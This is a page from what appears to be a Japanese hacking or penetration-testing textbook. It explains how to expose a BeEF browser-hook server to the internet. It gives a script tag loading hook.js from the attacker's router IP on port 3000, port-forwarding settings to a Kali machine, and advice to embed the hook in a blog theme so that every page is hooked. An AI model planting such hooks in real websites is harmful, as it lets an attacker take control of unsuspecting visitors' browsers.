
507
第6章 LAN のハッキング
ルーターのグローバルIP アドレスを指定した形のコードになります(*31)。
<script src="http://<ルーターのグローバルIPアドレス>:3000/hook.↲
js"></script>
そして、ルーターでは次のようなポートフォワーディングの設定をします。
WAN側ポート(サービスポート):3000
LAN側ポート(内部ポート):3000
LAN側の転送先 IP アドレス:KaliのIP アドレス
プロトコル:すべて
罠ページをブログに設置するのであれば、ブログのテーマに上記のコードを埋
め込むことで、すべてのWeb ページに適用できます。
一見すると効果的な攻撃のように見えますが、ターゲットが罠ページを閉じて
しまうと、BeEFのコントロールパネルからターゲット端末は消えてしまいます。
つまり、一部を自動化しないと、さらなる攻撃はなかなかうまくいかないでしょ
う。
*31:静的IP アドレスでなければ、ダイナミック DNSを登録して、そのドメインを指定する方が
確実です。ダイナミックDNS とは、グローバルIP アドレスが変更になった際に、新しいIP アド
レスを各DNSサーバーに通知するサービスです。ダイナミック DNSサービスが提供するホスト
名を用いれば、IPアドレスが動的に変わることを意識する必要がなくなります。